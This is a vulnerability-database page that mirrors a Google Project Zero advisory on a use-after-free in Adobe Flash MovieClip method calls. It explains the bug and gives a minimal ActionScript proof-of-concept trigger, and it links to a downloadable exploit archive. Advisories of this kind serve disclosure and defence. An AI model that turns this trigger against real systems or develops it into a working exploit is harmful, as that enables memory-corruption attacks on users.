Lucene search
+L

Adobe Flash - Method Calls Use-After-Free

🗓️ 08 Sep 2016 00:00:00Reported by Google Security ResearchType 
zdt
 zdt
🔗 0day.today👁 15 Views

Adobe Flash MovieClip Method Calls Use-After-Free Vulnerabilit

Code
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=846
 
If a method is called on a MovieClip, and a getter is set with the name of the method, the getter will get executed during the call, and can free the MovieClip, leading to a user-after-free. A minimal PoC is as follows:
 
var mc =  this.createEmptyMovieClip( "mc", 1);
mc.addProperty( "f", func, func );
mc.f("hello");
 
function func(){
     
    mc.removeMovieClip();
    // Fix heap
    var d:Date = new Date();
    return d.getDate;
     
    }   
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40356.zip

#  0day.today [2018-01-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Sep 2016 00:00Current
7.1High risk
Vulners AI Score7.1
15